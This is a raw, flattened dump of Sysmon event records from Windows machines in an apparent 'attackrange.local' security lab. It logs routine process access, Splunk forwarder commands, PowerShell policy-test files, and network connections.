09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5B00-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CD5-6151-5A00-00000000FD01}31523688C:\Windows\system32\cmd.exe{5EBD8912-8CD5-6151-5B00-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.218{5EBD8912-8CD5-6151-5B00-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD5-6151-5A00-00000000FD01}3152C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001053963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5A00-00000000FD01}3152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5A00-00000000FD01}3152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD5-6151-5A00-00000000FD01}3152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.212{5EBD8912-8CD5-6151-5A00-00000000FD01}3152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 17141700x80000000000000001053950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:21.189{5EBD8912-8CD4-6151-5600-00000000FD01}3348\PSHost.132772080209287769.3348.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001053949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.189{5EBD8912-8CD4-6151-5600-00000000FD01}3348NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_4e1uwz4r.2lo.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.188{5EBD8912-8CD4-6151-5600-00000000FD01}3348NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jqzyjzud.vt1.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.172{5EBD8912-8CD4-6151-5900-00000000FD01}33162832C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001053946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.172{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jqzyjzud.vt1.ps12021-09-27 09:20:21.172 10341000x80000000000000001053945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.156{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001053944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.077{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49695-false169.254.169.254-80http 354300x80000000000000001053943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.076{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49694-false169.254.169.254-80http 354300x8000000000000000980533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:18.500{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56960-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:21.246{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6DF263BC76DD36AC2772A70FA895A09,SHA256=453C0E708F54BC4DBC6E518A8762316120EE0A5D9BC14BDB3550673988CB0DD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 